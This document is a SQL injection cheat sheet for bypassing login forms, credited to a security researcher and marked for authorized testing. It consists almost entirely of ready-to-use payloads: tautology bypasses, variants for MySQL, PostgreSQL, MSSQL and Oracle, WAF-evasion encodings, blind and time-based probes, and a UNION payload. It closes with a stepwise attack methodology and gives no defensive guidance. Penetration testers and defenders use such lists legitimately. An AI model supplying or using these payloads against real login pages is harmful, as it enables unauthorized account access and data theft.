SQL Injection Login Bypass - Ultimate Cheatsheet
Curated by Aryan Giri | Cybersecurity Researcher
For authorized penetration testing only
UNIVERSAL BYPASS PAYLOADS (80% Success Rate)
These work on most SQL databases regardless of configuration
Payload              Rating     Tag
' OR '1'='1          CRITICAL   Universal
' OR 1=1--           CRITICAL   Universal
admin' OR '1'='1     CRITICAL   Universal
' OR 'a'='a          CRITICAL   Universal
' OR ''='            CRITICAL   Universal
CLASSIC & PROVEN PAYLOADS
Time-tested payloads that work in most scenarios
Payload              Rating   Tag
' OR 1=1#            HIGH     MySQL
' OR 1=1 /*          HIGH     Multi-line
' OR '1'='1'-- -     HIGH     With Space
' OR 1 LIMIT 1--     HIGH     MySQL
DATABASE-SPECIFIC PAYLOADS
Targeted payloads for specific database engines
MySQL Specific
Payload                      Rating   Tag
' || '1'='1'--               MEDIUM   MySQL
' OR 1=1 --+                 MEDIUM   MySQL
' OR '1'='1'/*!50000--*/     MEDIUM   MySQL v5+
PostgreSQL Specific
Payload                      Rating   Tag
' OR '1'='1'--               MEDIUM   PostgreSQL
' OR 1--                     MEDIUM   PostgreSQL
MSSQL Specific
Payload                      Rating   Tag
' OR '1'='1'--               MEDIUM   MSSQL
admin' OR '1'='1'--          MEDIUM   MSSQL
Oracle Specific
Payload                      Rating   Tag
' OR '1'='1'--               MEDIUM   Oracle
' OR 1=1--                   MEDIUM   Oracle
WAF & FILTER BYPASS TECHNIQUES
Evade Web Application Firewalls and input filters
Payload                   Rating   Tag
'/**/OR/**/'1'='1'--      MEDIUM   Comment Bypass
'%0AOR%0A'1'='1'--        MEDIUM   Newline Bypass
'%09OR%091=1--            MEDIUM   Tab Bypass
' OR '1'LIKE'1'--         MEDIUM   Operator Bypass
' /*!OR*/ '1'='1'--       MEDIUM   MySQL Version
ADVANCED & CREATIVE PAYLOADS
For sophisticated filters and edge cases
Payload                      Rating   Tag
' OR TRUE--                  LOW      Boolean
' OR NOT 0--                 LOW      Boolean Not
' XOR '1'='2'--              LOW      XOR Logic
' OR 1=1 AND SLEEP(5)--      LOW      Time Based
BLIND SQL INJECTION BYPASS
When you can't see direct results but can infer success
Payload                                  Rating   Tag
' OR (SELECT COUNT(*))>0--               HIGH     Blind
' OR EXISTS(SELECT * FROM users)--       HIGH     Blind
' OR LENGTH(database())>0--              HIGH     Blind
' OR SUBSTRING(database(),1,1)='a'--     HIGH     Blind
TESTING METHODOLOGY
- Start with Universal Payloads - Try the first 5 payloads from the Universal category
- Identify Database - Use error messages or DB-specific payloads
- Try Classic Payloads - Use proven payloads for the identified DB
- Bypass WAF if blocked - Use comment/newline/tab bypass techniques
- Try Advanced Techniques - For sophisticated filters
- Attempt Blind SQLi - If there is no direct feedback
Additional Payloads (Special Cases):
' OR '1'='1' OR '1'='1
' OR '1'='1' AND '1'='1
admin' OR '1'='1'--'
' OR '1'='1' UNION SELECT NULL,NULL--